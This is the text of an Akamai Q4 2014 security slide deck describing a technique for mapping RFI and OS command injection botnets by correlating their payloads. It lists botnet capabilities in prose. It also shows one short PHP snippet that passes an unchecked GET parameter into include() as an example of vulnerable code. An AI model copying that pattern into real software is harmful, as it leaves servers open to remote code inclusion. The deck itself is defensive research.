[Q4 2014]
akamai.com
= botnet profiling technique
• New analysis technique using data from the Akamai Intelligent PlatformTM • Automate discovery of web application vulnerabilities for Remote File Inclusion (RFI) and OS Command Injection attacks • Botnets profiled by identifying malicious code resource URLs and seemingly identical payloads • Analysis does not require inclusion in the botnet or taking over the botnet’s command and control (C&C, C2) server [Download the Q4 2014 Global DDoS Attack Report for supporting data and analysis]
2 / [The State of the Internet] / Security (Q4 2014)
= Remote File Inclusion (RFI) attacks
• Used to exploit dynamic file include mechanisms in web applications • Web application can be tricked into including remote files with malicious code • RFI vulnerabilities are easily found and exploited by attackers $dir = $_GET['module_name']; include($dir . "/function.php"); Figure 1: Code vulnerable to a Remote File Inclusion attack
3 / [The State of the Internet] / Security (Q4 2014)
= OS Command Injection
• Used to execute unauthorized operating system commands • The result of mixing trusted code with untrusted data • Commands executed by the attacker will run with the same privileges of the commanding component • Attackers can leverage this ability to gain access and damage parts that are not reachable
4 / [The State of the Internet] / Security (Q4 2014)
= common payloads in botnets
• RFI and OS Command Injection are among the most prevalent of vulnerabilities reported • Attacker can take full control over the victim server • The most favorable attack vector
• In recent months, Akamai has observed massively orchestrated attempts to find such vulnerabilities • Botnet machines, even geographically disparate machines belonging to different organizations, try to inject the same remote piece of malicious code • Code correlations enabled Akamai to map multiple Internet botnets operating at the time of the comparison
5 / [The State of the Internet] / Security (Q4 2014)
= botnet findings
• RFI and OS Command Injection botnets targeted more than 850 web applications across several top-level domains over a seven-day period • All of the botnet traffic appeared to originate from compromised servers, most from popular Software-asa-Service (SaaS) and cloud hosting providers • The botnet Akamai analyzed included a dedicated Python script that performed web crawling disguised as a Microsoft Bing bot • In one instance, an observed botnet propagated through two WordPress TimThumb vulnerabilities
6 / [The State of the Internet] / Security (Q4 2014)
= analysis of botnet capabilities
Both RFI and OS Command Injection attacks used the same malicious code involving: • • • • •
Remote shell command execution Remote file upload (see figure) SMS sending, controlled by IRC commands Local FTP server credentials brute force attack IRC-controlled UDP/TCP denial of service flood
Figure 2: Code for remote file upload
7 / [The State of the Internet] / Security (Q4 2014)
= conclusion
• • • •
Novel approach to understanding web application-layer botnets Used attack payload as the common denominator to aggregate data and map botnet information Does not require the researcher to be a part of the botnet or to take over the botnet’s C2 server Can be used for mapping other types of malicious activities that use a distinct payload
8 / [The State of the Internet] / Security (Q4 2014)
= Q 4 2014 global attack report • Download the Q4 2014 State of the Internet Security Report • The Q4 2014 report covers: / Analysis of DDoS attack trends / Breakdown of average Gbps/Mbps statistics / Year-over-year and quarter-by-quarter analysis / Types and frequency of application-layer attacks / Types and frequency of infrastructure attacks / Trends in attack frequency, size and sources / Where and when DDoSers launch attacks / Case study and analysis
9 / [The State of the Internet] / Security (Q4 2014)
= about Prolexic
•
StateoftheInternet.com, brought to you by Akamai, serves as the home for content and information intended to provide an informed view into online connectivity and cybersecurity trends as well as related metrics, including Internet connection speeds, broadband adoption, mobile usage, outages, and cyber-attacks and threats.
•
Visitors to www.stateoftheinternet.com can find current and archived versions of Akamai’s State of the Internet (Connectivity and Security) reports, the company’s data visualizations, and other resources designed to put context around the ever-changing Internet landscape.
10 / [The State of the Internet] / Security (Q4 2014)